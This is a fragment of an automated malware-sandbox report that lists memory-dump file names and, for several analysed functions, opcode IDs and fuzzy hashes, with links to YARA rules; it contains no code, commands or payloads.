                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                                                                                    • Instruction ID: afd6f86e1ed7dc578beff9a6215ab27dc393fb41cabbec3b70aacfa27007612f
                                                                                                                    • Opcode Fuzzy Hash: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                                                                                    • Instruction Fuzzy Hash: EB014B72A196204B8308CE3C9C1112ABEE19B86330F158B2EBCFAD73E0D664CD548696
                                                                                                                    Function 0010B410 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                                                                                    • Instruction ID: 52f360250560b777f6b92e9d8a4c74a81f42c0f13df6abbeaed25672db32b04f
                                                                                                                    • Opcode Fuzzy Hash: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                                                                                    • Instruction Fuzzy Hash: 04F0ECB160861057DF228A549CC0F37BB9CCB97354F190426F8C6D7583D3E15945C3E5
                                                                                                                    Function 00128220 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 991e4c52940dd26e15b05246056b02b58d3b7cb49cdb854af8ba31d223cbf43f
                                                                                                                    • Instruction ID: 1cc16acb0d882e950c3dbd93b3590a0037f115d86d7dec11a4376f21e37879a0
                                                                                                                    • Opcode Fuzzy Hash: 991e4c52940dd26e15b05246056b02b58d3b7cb49cdb854af8ba31d223cbf43f
                                                                                                                    • Instruction Fuzzy Hash: C201E4B04107009FC360EF29C545747BBE8EB08714F004A1DE8AECB680D770A5448B82
                                                                                                                    Function 00131440 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                    • Instruction ID: 61423a7b6cd640c0097baff976ffb58fca84ead7237b07f2e6f819771ad9ea9a
                                                                                                                    • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                    • Instruction Fuzzy Hash: 9ED0A73160832196DF748E19A400977F7F0EAC7B11F49955EF586E3148D330DC41C2A9
                                                                                                                    Function 00101ACD Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 19836487f74cde5e4b60854faceb27d70f8ae8d616c28e236b84f693c18c36e2
                                                                                                                    • Instruction ID: e3e979f90eba3710393807006982835423352b5891adebd4edfc265f8530487a
                                                                                                                    • Opcode Fuzzy Hash: 19836487f74cde5e4b60854faceb27d70f8ae8d616c28e236b84f693c18c36e2
                                                                                                                    • Instruction Fuzzy Hash: 5DC01238A180008BC2088F40B895A32A2B8A307308700A02EDA02F3AA1CA60C4528909
                                                                                                                    Function 00136094 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4969f1fbc7ea77d2ead4dc12d7775187e62ba5ebe4d7f91d4080e5a24dec4eb0
                                                                                                                    • Instruction ID: cf06eb14dc24f02fb24c798b97dc39f1e826ea7f24ad5ef5c51179d50c236670
                                                                                                                    • Opcode Fuzzy Hash: 4969f1fbc7ea77d2ead4dc12d7775187e62ba5ebe4d7f91d4080e5a24dec4eb0
                                                                                                                    • Instruction Fuzzy Hash: 7CC09B3C65C00087D20CCF04D951575F3BBDBA7B18B34B12DC82623675C134D552951C
                                                                                                                    Function 00101A3C Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97b061095980ce6512048b9c246db95c6aade8c4573c6683da2117cd92a3f464
                                                                                                                    • Instruction ID: 3db17d8b55bd56662ebc96bd80af6ffd440c2240a845d15c0ac95ceec8b5698d
                                                                                                                    • Opcode Fuzzy Hash: 97b061095980ce6512048b9c246db95c6aade8c4573c6683da2117cd92a3f464
                                                                                                                    • Instruction Fuzzy Hash: 92C04C34F59040CAC2488E85A891532A2A89306208710703E9642F76A1C660D4568509
                                                                                                                    Function 00135FD6 Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed112eae4335e9ed26c8517a8f7738a677b3ea0006bb5970bc537380ee4b340d
                                                                                                                    • Instruction ID: 0a5eaef60bb00388ed5b427fbeb2cb5df4f4fa4a34e41da8858b58328171ae4c
                                                                                                                    • Opcode Fuzzy Hash: ed112eae4335e9ed26c8517a8f7738a677b3ea0006bb5970bc537380ee4b340d
                                                                                                                    • Instruction Fuzzy Hash: E2C09228B680008BA24CCF18DD51A35F2BADBABA18B24B13DC816A3A66D134D552860C